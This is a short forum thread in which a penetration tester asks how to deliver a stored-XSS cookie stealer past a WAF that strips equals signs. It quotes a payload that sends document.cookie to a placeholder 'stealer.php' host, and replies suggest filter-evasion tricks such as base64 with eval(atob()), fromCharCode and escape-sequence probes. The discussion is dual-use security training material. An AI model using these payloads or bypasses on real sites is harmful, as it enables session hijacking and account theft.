
XSS cookie stealer without equals


friedfish

Hi all,

 

I am pentesting a web application and found a persistent XSS on a comment PHP page, so I am able to trigger the classic modified payload:


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

Unfortunately there is a WAF that filters the equal sign 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

 and I am not able to run a cookie redirect script. 

 

I tried to encode = 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

With Firebug, in the source code I see this result:

 


<script>

location.href = http://www.yoursite.com/stealer.php?cookie = +document.cookie;

</script>

 

and it obviously doesn't work.

 

I also tried the example in the following link with the same failure result:

http://security.stackexchange.com/questions/36629/cross-site-scripting-without-special-chars

 

Do you have any suggestion?

 

Thank you!

GiRa

This could work:

$ echo -n 'alert("example")  ' | base64
YWxlcnQoImV4YW1wbGUiKSAg

Please note the trailing spaces in the echo argument, to prevent the base64 encoding from producing equals signs.

 

Then in JS:

eval(atob('YWxlcnQoImV4YW1wbGUiKSAg'))

friedfish

Thank you GiRa, but it doesn't work.

With firebug I see the following source code:

 

<p>

<script>

eval(atob('ywxlcnqoimv4yw1wbguiksag'))

</script>

</p>

GiRa

So, everything is converted to lowercase.

 

An eval(String.fromCharCode(...)) should work then.

 

Edit: does the filter detect '==' vs just '='?

friedfish

Yes,

just tried; it filters all equals: = == ===

 

I have no idea how to bypass it... The strange thing is that if I encode the script in HTML I see the equals:

 



<p> <sc=ript>al=ert(eval(atob('ywxlcnqoimv4yw1wbguiksag')))</sc=ript> </p>


Giuseppe

I don't think String.fromCharCode will work, because it will be translated to string.fromcharcode, which is not valid.

Anyway, you should try to enumerate all the filters, for example blocked characters, string translations and so on...

 

First (of many) attempt(s): "is there a character-escaping filter?"

<sc=ript>eval('\x61lert(1)')</scr=ipt><sc=ript>eval('\u0061lert(1)')</scr=ipt>
...

 

The WAPTx has a dedicated module for this :P

